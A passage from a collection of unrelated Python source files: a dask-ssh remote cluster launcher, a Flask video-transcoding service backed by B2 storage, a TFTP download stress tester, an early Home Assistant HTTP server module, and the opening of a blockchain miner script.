retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger("paramiko").setLevel(logging.WARN)
ssh.connect(
hostname=cmd_dict["address"],
username=cmd_dict["ssh_username"],
port=cmd_dict["ssh_port"],
key_filename=cmd_dict["ssh_private_key"],
compress=True,
timeout=30,
banner_timeout=30,
) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException, PasswordRequiredException) as e:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection error when connecting to {addr}:{port}"
"to run '{cmd}'".format(
addr=cmd_dict["address"],
port=cmd_dict["ssh_port"],
cmd=cmd_dict["cmd"],
)
+ bcolors.ENDC
)
print(
bcolors.FAIL
+ " SSH reported this exception: "
+ str(e)
+ bcolors.ENDC
)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection failed after 3 retries. Exiting."
+ bcolors.ENDC
)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(
" "
+ bcolors.FAIL
+ f"Retrying... (attempt {retries}/3)"
+ bcolors.ENDC
)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print("[ {label} ] : {cmd}".format(label=cmd_dict["label"], cmd=cmd_dict["cmd"]))
stdin, stdout, stderr = ssh.exec_command(
"$SHELL -i -c '" + cmd_dict["cmd"] + "'", get_pty=True
)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug("stdout from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : {output}".format(
label=cmd_dict["label"], output=line
)
)
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug("stderr from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ line
+ bcolors.ENDC
)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ "remote process exited with exit status "
+ str(exit_status)
+ bcolors.ENDC
)
return True
# Get transport to current SSH client
transport = ssh.get_transport()
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict["input_queue"].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
# Send noise down the pipe to keep connection active
transport.send_ignore()
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b"\x03") # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(
logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None
):
cmd = "{python} -m distributed.cli.dask_scheduler --port {port}".format(
python=remote_python or sys.executable, port=port
)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = f"mkdir -p {logdir} && {cmd}"
cmd += "&> {logdir}/dask_scheduler_{addr}:{port}.log".format(
addr=addr, port=port, logdir=logdir
)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = f"{bcolors.BOLD}scheduler {addr}:{port}{bcolors.ENDC}"
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": addr,
"port": port,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
def start_worker(
logdir,
scheduler_addr,
scheduler_port,
worker_addr,
nthreads,
nprocs,
ssh_username,
ssh_port,
ssh_private_key,
nohost,
memory_limit,
worker_port,
nanny_port,
remote_python=None,
remote_dask_worker="distributed.cli.dask_worker",
local_directory=None,
):
cmd = (
"{python} -m {remote_dask_worker} "
"{scheduler_addr}:{scheduler_port} "
"--nthreads {nthreads}" + (" --nprocs {nprocs}" if nprocs != 1 else "")
)
if not nohost:
cmd += " --host {worker_addr}"
if memory_limit:
cmd += " --memory-limit {memory_limit}"
if worker_port:
cmd += " --worker-port {worker_port}"
if nanny_port:
cmd += " --nanny-port {nanny_port}"
cmd = cmd.format(
python=remote_python or sys.executable,
remote_dask_worker=remote_dask_worker,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs,
memory_limit=memory_limit,
worker_port=worker_port,
nanny_port=nanny_port,
)
if local_directory is not None:
cmd += " --local-directory {local_directory}".format(
local_directory=local_directory
)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = f"mkdir -p {logdir} && {cmd}"
cmd += "&> {logdir}/dask_scheduler_{addr}.log".format(
addr=worker_addr, logdir=logdir
)
label = f"worker {worker_addr}"
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": worker_addr,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
class SSHCluster:
def __init__(
self,
scheduler_addr,
scheduler_port,
worker_addrs,
nthreads=0,
nprocs=1,
ssh_username=None,
ssh_port=22,
ssh_private_key=None,
nohost=False,
logdir=None,
remote_python=None,
memory_limit=None,
worker_port=None,
nanny_port=None,
remote_dask_worker="distributed.cli.dask_worker",
local_directory=None,
):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
self.memory_limit = memory_limit
self.worker_port = worker_port
self.nanny_port = nanny_port
self.remote_dask_worker = remote_dask_worker
self.local_directory = local_directory
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(
logdir,
"dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"),
)
print(
bcolors.WARNING + "Output will be redirected to logfiles "
'stored locally on individual worker nodes under "{logdir}".'.format(
logdir=logdir
)
+ bcolors.ENDC
)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(
logdir,
scheduler_addr,
scheduler_port,
ssh_username,
ssh_port,
ssh_private_key,
remote_python,
)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return "%s:%d" % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process["output_queue"].empty():
print(process["output_queue"].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(
start_worker(
self.logdir,
self.scheduler_addr,
self.scheduler_port,
address,
self.nthreads,
self.nprocs,
self.ssh_username,
self.ssh_port,
self.ssh_private_key,
self.nohost,
self.memory_limit,
self.worker_port,
self.nanny_port,
self.remote_python,
self.remote_dask_worker,
self.local_directory,
)
)
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process["input_queue"].put("shutdown")
process["thread"].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
|
app.py
|
import boto3
import io
import os
import requests
from subprocess import run, PIPE
from flask import Flask
from flask_restful import Resource, Api, reqparse
from threading import Thread
from uuid import uuid4
from tempfile import mkdtemp
# Never put credentials in your code!
from dotenv import load_dotenv
load_dotenv()
# Obtain B2 S3 compatible client
s3 = boto3.client(service_name='s3',
endpoint_url=os.environ['B2_ENDPOINT_URL'],
aws_access_key_id=os.environ['B2_APPLICATION_KEY_ID'],
aws_secret_access_key=os.environ['B2_APPLICATION_KEY'])
bucket_name = os.environ['BUCKET_NAME']
app = Flask(__name__)
api = Api(app)
parser = reqparse.RequestParser()
parser.add_argument('inputObject', required=True)
parser.add_argument('webhook', required=True)
def transcode(inputObject, webhook):
input_key = inputObject
# Unfortunately, we can't stream the B2 object into ffmpeg, since many video
# formats require ffmpeg to seek around the data to decode it
input_file = os.path.join(mkdtemp(), str(uuid4()))
print(f'Downloading s3://{bucket_name}/{input_key} to {input_file}')
s3.download_file(bucket_name, input_key, input_file)
output_file = input_file + '.mp4'
command = f'ffmpeg -i {input_file} -c:a copy -s hd720 -preset superfast -y {output_file}'
print(f'Running {command}', flush=True)
# Have to run in a shell to make this work in a worker thread
cp = run(command, shell=True)
print(f'Exit status {cp.returncode}')
if cp.returncode == 0:
output_key = os.path.splitext(input_key)[0]+'.mp4'
print(f'Uploading {output_file} to s3://{bucket_name}/{output_key}')
s3.upload_file(output_file, os.environ['BUCKET_NAME'], output_key)
response = {
'status': 'success',
'inputObject': input_key,
'outputObject': output_key
}
else:
response = {
'status': 'failure',
'inputObject': input_key
}
print(f'POSTing {response} to {webhook}')
r = requests.post(webhook, json=response)
print(f'Status code {r.status_code}')
class Videos(Resource):
def post(self):
args = parser.parse_args()
thread = Thread(target=transcode, kwargs={**args})
thread.start()
return {'status': 'transcoding'}, 200
api.add_resource(Videos, '/videos')
if __name__ == '__main__':
app.run()
|
tftp_stress_test.py
|
import datetime
import os
import sys
import time
import logger
from optparse import OptionParser
from multiprocessing import Process,JoinableQueue, Queue
import queue
import tftpy
from random import randint
my_logger = logger.getLogger("TftpStress")
download_file_names = [
"BOOT",
"boot_emmc-boot.scr",
"boot_emmc-gpt.cmd",
"boot_emmc-recovery.cmd",
"boot_emmc-rootfs_rw.scr",
"boot_emmc-system.scr",
"data.1-of-1.gz",
"partition16G_ro.xml",
"rootfs.2-of-10.gz",
"rootfs.6-of-10.gz",
"rootfs_rw.1-of-1.gz",
"system.3-of-8.gz",
"system.7-of-8.gz",
"boot.1-of-1.gz",
"boot_emmc.cmd",
"boot_emmc-gpt.scr",
"boot_emmc-recovery.scr",
"boot_emmc-rootfs.scr",
"boot.scr",
"fip.bin",
"recovery.1-of-1.gz",
"rootfs.3-of-10.gz",
"rootfs.7-of-10.gz",
"spi_flash.bin",
"system.4-of-8.gz",
"system.8-of-8.gz",
"boot.cmd",
"boot_emmc-data.cmd",
"boot_emmc-misc.cmd",
"boot_emmc-rootfs.cmd",
"boot_emmc.scr",
"boot_spif.cmd",
"gpt.gz",
"rootfs.10-of-10.gz",
"rootfs.4-of-10.gz",
"rootfs.8-of-10.gz",
"system.1-of-8.gz",
"system.5-of-8.gz",
"tftp.MD",
"boot_emmc-boot.cmd",
"boot_emmc-data.scr",
"boot_emmc-misc.scr",
"boot_emmc-rootfs_rw.cmd",
"boot_emmc-system.cmd",
"boot_spif.scr",
"misc.1-of-1.gz",
"rootfs.1-of-10.gz",
"rootfs.5-of-10.gz",
"rootfs.9-of-10.gz",
"system.2-of-8.gz",
"system.6-of-8.gz"
]
def get_next_file():
idx = randint(0, len(download_file_names)-1)
return download_file_names[idx]
def tftp_downloader(name, rq, host, port, blksize, tsize, localip, timeout ):
"""
post get_open_lock by process
:param name:
:param ip:
:param group_id:
:param total:
:param delay:
:return:
"""
while True:
name = get_next_file()
output_name = "%s_dw" %(name)
tftp_options = {}
tftp_options['timeout'] = int(timeout)
if blksize:
tftp_options['blksize'] = int(blksize)
if tsize:
tftp_options['tsize'] = 0
tclient = tftpy.TftpClient(host,
int(port),
tftp_options,
localip)
class Progress(object):
def __init__(self, out):
self.progress = 0
self.out = out
def progresshook(self, pkt):
if isinstance(pkt, tftpy.TftpPacketTypes.TftpPacketDAT):
self.progress += len(pkt.data)
#self.out("Transferred %d bytes" % self.progress)
elif isinstance(pkt, tftpy.TftpPacketTypes.TftpPacketOACK):
#self.out("Received OACK, options are: %s" % pkt.options)
pass
progresshook = Progress(my_logger.info).progresshook
try:
tclient.download(name,
output_name,
progresshook)
rq.put('OK: %s' %(name))
except tftpy.TftpException as err:
sys.stderr.write("%s\n" % str(err))
my_logger.error("下载出错,退出压测程序")
sys.exit(1)
except KeyboardInterrupt:
pass
def statics(name, rq):
ok_cnts = 0
ng_cnts = 0
to_cnts = 0
while True:
time.sleep(1)
def download_stress(max_tasks, host, port, blksize, tsize, localip,timeout):
result_queue = Queue()
processes = []
#创建统计进程
sp = Process(target=statics, args=("sp", result_queue))
#创建下载进程
for i in range(max_tasks):
p = Process(target=tftp_downloader, args=("dp", result_queue, host, port, blksize, tsize,localip,timeout))
processes.append(p)
sp.start()
for p in processes:
p.start()
sp.join()
for p in processes:
p.join()
def main():
usage = ""
parser = OptionParser(usage=usage)
parser.add_option('-i',
'--host',
type='string',
help='server ip',
default="192.168.1.99")
parser.add_option('-p',
'--port',
type='int',
help='tftp port (default: 69)',
default=69)
parser.add_option('-b',
'--blksize',
type='int',
default=512,
help='udp packet size to use (default: 512)')
parser.add_option('-n',
'--max_tasks',
type='int',
help='并发下载进程数量',
default=1)
parser.add_option('-d',
'--max_download_speed',
type='int',
help='并发速度限制',
default=1)
parser.add_option('-T',
'--timeout',
type='int',
help='超时设置',
default=7)
parser.add_option('-t',
'--tsize',
action='store_true',
default=False,
help="ask client to send tsize option in download")
parser.add_option('-l',
'--localip',
action='store',
dest='localip',
default="",
help='local IP for client to bind to (ie. interface)')
options, args = parser.parse_args()
download_stress(options.max_tasks, options.host, options.port, options.blksize, options.tsize, options.localip, options.timeout)
if __name__ == '__main__':
main()
|
http.py
|
"""
This module provides WSGI application to serve the Home Assistant API.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/http/
"""
import hmac
import json
import logging
import mimetypes
import threading
import re
import ssl
import voluptuous as vol
import homeassistant.remote as rem
from homeassistant import util
from homeassistant.const import (
SERVER_PORT, HTTP_HEADER_HA_AUTH, HTTP_HEADER_CACHE_CONTROL,
HTTP_HEADER_ACCESS_CONTROL_ALLOW_ORIGIN, CONTENT_TYPE_JSON,
HTTP_HEADER_ACCESS_CONTROL_ALLOW_HEADERS, ALLOWED_CORS_HEADERS,
EVENT_HOMEASSISTANT_STOP, EVENT_HOMEASSISTANT_START)
from homeassistant.core import split_entity_id
import homeassistant.util.dt as dt_util
import homeassistant.helpers.config_validation as cv
from homeassistant.components import persistent_notification
DOMAIN = 'http'
REQUIREMENTS = ('cherrypy==8.1.0', 'static3==0.7.0', 'Werkzeug==0.11.11')
CONF_API_PASSWORD = 'api_password'
CONF_APPROVED_IPS = 'approved_ips'
CONF_SERVER_HOST = 'server_host'
CONF_SERVER_PORT = 'server_port'
CONF_DEVELOPMENT = 'development'
CONF_SSL_CERTIFICATE = 'ssl_certificate'
CONF_SSL_KEY = 'ssl_key'
CONF_CORS_ORIGINS = 'cors_allowed_origins'
DATA_API_PASSWORD = 'api_password'
NOTIFICATION_ID_LOGIN = 'http-login'
# TLS configuation follows the best-practice guidelines specified here:
# https://wiki.mozilla.org/Security/Server_Side_TLS
# Intermediate guidelines are followed.
SSL_VERSION = ssl.PROTOCOL_SSLv23
SSL_OPTS = ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
if hasattr(ssl, 'OP_NO_COMPRESSION'):
SSL_OPTS |= ssl.OP_NO_COMPRESSION
CIPHERS = "ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:" \
"ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:" \
"ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:" \
"DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:" \
"ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256:" \
"ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:" \
"ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA384:" \
"ECDHE-ECDSA-AES256-SHA:ECDHE-RSA-AES256-SHA:" \
"DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:" \
"DHE-RSA-AES256-SHA:ECDHE-ECDSA-DES-CBC3-SHA:" \
"ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES128-GCM-SHA256:" \
"AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:" \
"AES256-SHA:DES-CBC3-SHA:!DSS"
_FINGERPRINT = re.compile(r'^(.+)-[a-z0-9]{32}\.(\w+)$', re.IGNORECASE)
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_API_PASSWORD): cv.string,
vol.Optional(CONF_SERVER_HOST): cv.string,
vol.Optional(CONF_SERVER_PORT, default=SERVER_PORT):
vol.All(vol.Coerce(int), vol.Range(min=1, max=65535)),
vol.Optional(CONF_DEVELOPMENT): cv.string,
vol.Optional(CONF_SSL_CERTIFICATE): cv.isfile,
vol.Optional(CONF_SSL_KEY): cv.isfile,
vol.Optional(CONF_CORS_ORIGINS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_APPROVED_IPS): vol.All(cv.ensure_list, [cv.string])
}),
}, extra=vol.ALLOW_EXTRA)
class HideSensitiveFilter(logging.Filter):
"""Filter API password calls."""
# pylint: disable=too-few-public-methods
def __init__(self, hass):
"""Initialize sensitive data filter."""
super().__init__()
self.hass = hass
def filter(self, record):
"""Hide sensitive data in messages."""
if self.hass.wsgi.api_password is None:
return True
record.msg = record.msg.replace(self.hass.wsgi.api_password, '*******')
return True
def setup(hass, config):
"""Set up the HTTP API and debug interface."""
_LOGGER.addFilter(HideSensitiveFilter(hass))
conf = config.get(DOMAIN, {})
api_password = util.convert(conf.get(CONF_API_PASSWORD), str)
server_host = conf.get(CONF_SERVER_HOST, '0.0.0.0')
server_port = conf.get(CONF_SERVER_PORT, SERVER_PORT)
development = str(conf.get(CONF_DEVELOPMENT, '')) == '1'
ssl_certificate = conf.get(CONF_SSL_CERTIFICATE)
ssl_key = conf.get(CONF_SSL_KEY)
cors_origins = conf.get(CONF_CORS_ORIGINS, [])
approved_ips = conf.get(CONF_APPROVED_IPS, [])
server = HomeAssistantWSGI(
hass,
development=development,
server_host=server_host,
server_port=server_port,
api_password=api_password,
ssl_certificate=ssl_certificate,
ssl_key=ssl_key,
cors_origins=cors_origins,
approved_ips=approved_ips
)
def start_wsgi_server(event):
"""Start the WSGI server."""
server.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, start_wsgi_server)
def stop_wsgi_server(event):
"""Stop the WSGI server."""
server.stop()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_wsgi_server)
hass.wsgi = server
hass.config.api = rem.API(server_host if server_host != '0.0.0.0'
else util.get_local_ip(),
api_password, server_port,
ssl_certificate is not None)
return True
def request_class():
"""Generate request class.
Done in method because of imports.
"""
from werkzeug.exceptions import BadRequest
from werkzeug.wrappers import BaseRequest, AcceptMixin
from werkzeug.utils import cached_property
class Request(BaseRequest, AcceptMixin):
"""Base class for incoming requests."""
@cached_property
def json(self):
"""Get the result of json.loads if possible."""
if not self.data:
return None
# elif 'json' not in self.environ.get('CONTENT_TYPE', ''):
# raise BadRequest('Not a JSON request')
try:
return json.loads(self.data.decode(
self.charset, self.encoding_errors))
except (TypeError, ValueError):
raise BadRequest('Unable to read JSON request')
return Request
def routing_map(hass):
"""Generate empty routing map with HA validators."""
from werkzeug.routing import Map, BaseConverter, ValidationError
class EntityValidator(BaseConverter):
"""Validate entity_id in urls."""
regex = r"(\w+)\.(\w+)"
def __init__(self, url_map, exist=True, domain=None):
"""Initilalize entity validator."""
super().__init__(url_map)
self._exist = exist
self._domain = domain
def to_python(self, value):
"""Validate entity id."""
if self._exist and hass.states.get(value) is None:
raise ValidationError()
if self._domain is not None and \
split_entity_id(value)[0] != self._domain:
raise ValidationError()
return value
def to_url(self, value):
"""Convert entity_id for a url."""
return value
class DateValidator(BaseConverter):
"""Validate dates in urls."""
regex = r'\d{4}-\d{1,2}-\d{1,2}'
def to_python(self, value):
"""Validate and convert date."""
parsed = dt_util.parse_date(value)
if parsed is None:
raise ValidationError()
return parsed
def to_url(self, value):
"""Convert date to url value."""
return value.isoformat()
class DateTimeValidator(BaseConverter):
"""Validate datetimes in urls formatted per ISO 8601."""
regex = r'\d{4}-[01]\d-[0-3]\dT[0-2]\d:[0-5]\d:[0-5]\d' \
r'\.\d+([+-][0-2]\d:[0-5]\d|Z)'
def to_python(self, value):
"""Validate and convert date."""
parsed = dt_util.parse_datetime(value)
if parsed is None:
raise ValidationError()
return parsed
def to_url(self, value):
"""Convert date to url value."""
return value.isoformat()
return Map(converters={
'entity': EntityValidator,
'date': DateValidator,
'datetime': DateTimeValidator,
})
class HomeAssistantWSGI(object):
"""WSGI server for Home Assistant."""
# pylint: disable=too-many-instance-attributes, too-many-locals
# pylint: disable=too-many-arguments
def __init__(self, hass, development, api_password, ssl_certificate,
ssl_key, server_host, server_port, cors_origins,
approved_ips):
"""Initilalize the WSGI Home Assistant server."""
from werkzeug.wrappers import Response
Response.mimetype = 'text/html'
# pylint: disable=invalid-name
self.Request = request_class()
self.url_map = routing_map(hass)
self.views = {}
self.hass = hass
self.extra_apps = {}
self.development = development
self.api_password = api_password
self.ssl_certificate = ssl_certificate
self.ssl_key = ssl_key
self.server_host = server_host
self.server_port = server_port
self.cors_origins = cors_origins
self.approved_ips = approved_ips
self.event_forwarder = None
self.server = None
def register_view(self, view):
"""Register a view with the WSGI server.
The view argument must be a class that inherits from HomeAssistantView.
It is optional to instantiate it before registering; this method will
handle it either way.
"""
from werkzeug.routing import Rule
if view.name in self.views:
_LOGGER.warning("View '%s' is being overwritten", view.name)
if isinstance(view, type):
# Instantiate the view, if needed
view = view(self.hass)
self.views[view.name] = view
rule = Rule(view.url, endpoint=view.name)
self.url_map.add(rule)
for url in view.extra_urls:
rule = Rule(url, endpoint=view.name)
self.url_map.add(rule)
def register_redirect(self, url, redirect_to):
"""Register a redirect with the server.
If given this must be either a string or callable. In case of a
callable it's called with the url adapter that triggered the match and
the values of the URL as keyword arguments and has to return the target
for the redirect, otherwise it has to be a string with placeholders in
rule syntax.
"""
from werkzeug.routing import Rule
self.url_map.add(Rule(url, redirect_to=redirect_to))
def register_static_path(self, url_root, path, cache_length=31):
"""Register a folder to serve as a static path.
Specify optional cache length of asset in days.
"""
from static import Cling
headers = []
if cache_length and not self.development:
# 1 year in seconds
cache_time = cache_length * 86400
headers.append({
'prefix': '',
HTTP_HEADER_CACHE_CONTROL:
"public, max-age={}".format(cache_time)
})
self.register_wsgi_app(url_root, Cling(path, headers=headers))
def register_wsgi_app(self, url_root, app):
"""Register a path to serve a WSGI app."""
if url_root in self.extra_apps:
_LOGGER.warning("Url root '%s' is being overwritten", url_root)
self.extra_apps[url_root] = app
def start(self):
"""Start the wsgi server."""
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_builtin import BuiltinSSLAdapter
# pylint: disable=too-few-public-methods,super-init-not-called
class ContextSSLAdapter(BuiltinSSLAdapter):
"""SSL Adapter that takes in an SSL context."""
def __init__(self, context):
self.context = context
# pylint: disable=no-member
self.server = wsgiserver.CherryPyWSGIServer(
(self.server_host, self.server_port), self,
server_name='Home Assistant')
if self.ssl_certificate:
context = ssl.SSLContext(SSL_VERSION)
context.options |= SSL_OPTS
context.set_ciphers(CIPHERS)
context.load_cert_chain(self.ssl_certificate, self.ssl_key)
self.server.ssl_adapter = ContextSSLAdapter(context)
threading.Thread(
target=self.server.start, daemon=True, name='WSGI-server').start()
def stop(self):
"""Stop the wsgi server."""
self.server.stop()
def dispatch_request(self, request):
"""Handle incoming request."""
from werkzeug.exceptions import (
MethodNotAllowed, NotFound, BadRequest, Unauthorized,
)
from werkzeug.routing import RequestRedirect
with request:
adapter = self.url_map.bind_to_environ(request.environ)
try:
endpoint, values = adapter.match()
return self.views[endpoint].handle_request(request, **values)
except RequestRedirect as ex:
return ex
except (BadRequest, NotFound, MethodNotAllowed,
Unauthorized) as ex:
resp = ex.get_response(request.environ)
if request.accept_mimetypes.accept_json:
resp.data = json.dumps({
'result': 'error',
'message': str(ex),
})
resp.mimetype = CONTENT_TYPE_JSON
return resp
def base_app(self, environ, start_response):
"""WSGI Handler of requests to base app."""
request = self.Request(environ)
response = self.dispatch_request(request)
if self.cors_origins:
cors_check = (environ.get('HTTP_ORIGIN') in self.cors_origins)
cors_headers = ", ".join(ALLOWED_CORS_HEADERS)
if cors_check:
response.headers[HTTP_HEADER_ACCESS_CONTROL_ALLOW_ORIGIN] = \
environ.get('HTTP_ORIGIN')
response.headers[HTTP_HEADER_ACCESS_CONTROL_ALLOW_HEADERS] = \
cors_headers
return response(environ, start_response)
def __call__(self, environ, start_response):
"""Handle a request for base app + extra apps."""
from werkzeug.wsgi import DispatcherMiddleware
if not self.hass.is_running:
from werkzeug.exceptions import BadRequest
return BadRequest()(environ, start_response)
app = DispatcherMiddleware(self.base_app, self.extra_apps)
# Strip out any cachebusting MD5 fingerprints
fingerprinted = _FINGERPRINT.match(environ.get('PATH_INFO', ''))
if fingerprinted:
environ['PATH_INFO'] = '{}.{}'.format(*fingerprinted.groups())
return app(environ, start_response)
class HomeAssistantView(object):
"""Base view for all views."""
extra_urls = []
requires_auth = True # Views inheriting from this class can override this
def __init__(self, hass):
"""Initilalize the base view."""
from werkzeug.wrappers import Response
if not hasattr(self, 'url'):
class_name = self.__class__.__name__
raise AttributeError(
'{0} missing required attribute "url"'.format(class_name)
)
if not hasattr(self, 'name'):
class_name = self.__class__.__name__
raise AttributeError(
'{0} missing required attribute "name"'.format(class_name)
)
self.hass = hass
# pylint: disable=invalid-name
self.Response = Response
def handle_request(self, request, **values):
"""Handle request to url."""
from werkzeug.exceptions import MethodNotAllowed, Unauthorized
if request.method == "OPTIONS":
# For CORS preflight requests.
return self.options(request)
try:
handler = getattr(self, request.method.lower())
except AttributeError:
raise MethodNotAllowed
# Auth code verbose on purpose
authenticated = False
if self.hass.wsgi.api_password is None:
authenticated = True
elif request.remote_addr in self.hass.wsgi.approved_ips:
authenticated = True
elif hmac.compare_digest(request.headers.get(HTTP_HEADER_HA_AUTH, ''),
self.hass.wsgi.api_password):
# A valid auth header has been set
authenticated = True
elif hmac.compare_digest(request.args.get(DATA_API_PASSWORD, ''),
self.hass.wsgi.api_password):
authenticated = True
if self.requires_auth and not authenticated:
_LOGGER.warning('Login attempt or request with an invalid '
'password from %s', request.remote_addr)
persistent_notification.create(
self.hass,
'Invalid password used from {}'.format(request.remote_addr),
'Login attempt failed', NOTIFICATION_ID_LOGIN)
raise Unauthorized()
request.authenticated = authenticated
_LOGGER.info('Serving %s to %s (auth: %s)',
request.path, request.remote_addr, authenticated)
result = handler(request, **values)
if isinstance(result, self.Response):
# The method handler returned a ready-made Response, how nice of it
return result
status_code = 200
if isinstance(result, tuple):
result, status_code = result
return self.Response(result, status=status_code)
def json(self, result, status_code=200):
"""Return a JSON response."""
msg = json.dumps(
result, sort_keys=True, cls=rem.JSONEncoder).encode('UTF-8')
return self.Response(
msg, mimetype=CONTENT_TYPE_JSON, status=status_code)
def json_message(self, error, status_code=200):
"""Return a JSON message response."""
return self.json({'message': error}, status_code)
def file(self, request, fil, mimetype=None):
"""Return a file."""
from werkzeug.wsgi import wrap_file
from werkzeug.exceptions import NotFound
if isinstance(fil, str):
if mimetype is None:
mimetype = mimetypes.guess_type(fil)[0]
try:
fil = open(fil, mode='br')
except IOError:
raise NotFound()
return self.Response(wrap_file(request.environ, fil),
mimetype=mimetype, direct_passthrough=True)
def options(self, request):
"""Default handler for OPTIONS (necessary for CORS preflight)."""
return self.Response('', status=200)
|
miner.py
|
from __future__ import print_function
import sys
import os
import math
import argparse
import time
import uuid
import hashlib
import copy
import base64
import threading
# import urllib.request
import secrets
import tornado.web
import tornado.websocket
import tornado.ioloop
import tornado.httpclient
import tornado.gen
import tornado.escape
import setting
import tree
# import node
import chain
import database
# import ecdsa
import eth_keys
# def longest_chain(from_hash = '0'*64):
# conn = database.get_conn2()
# c = conn.cursor()
# c.execute("SELECT * FROM chain WHERE prev_hash = ?", (from_hash,))
# roots = c.fetchall()
# chains = []
# prev_hashs = []
# for root in roots:
# # chains.append([root.hash])
# chains.append([root])
# # print(root)
# block_hash = root[1]
# prev_hashs.append(block_hash)
# t0 = time.time()
# n = 0
# while True:
# if prev_hashs:
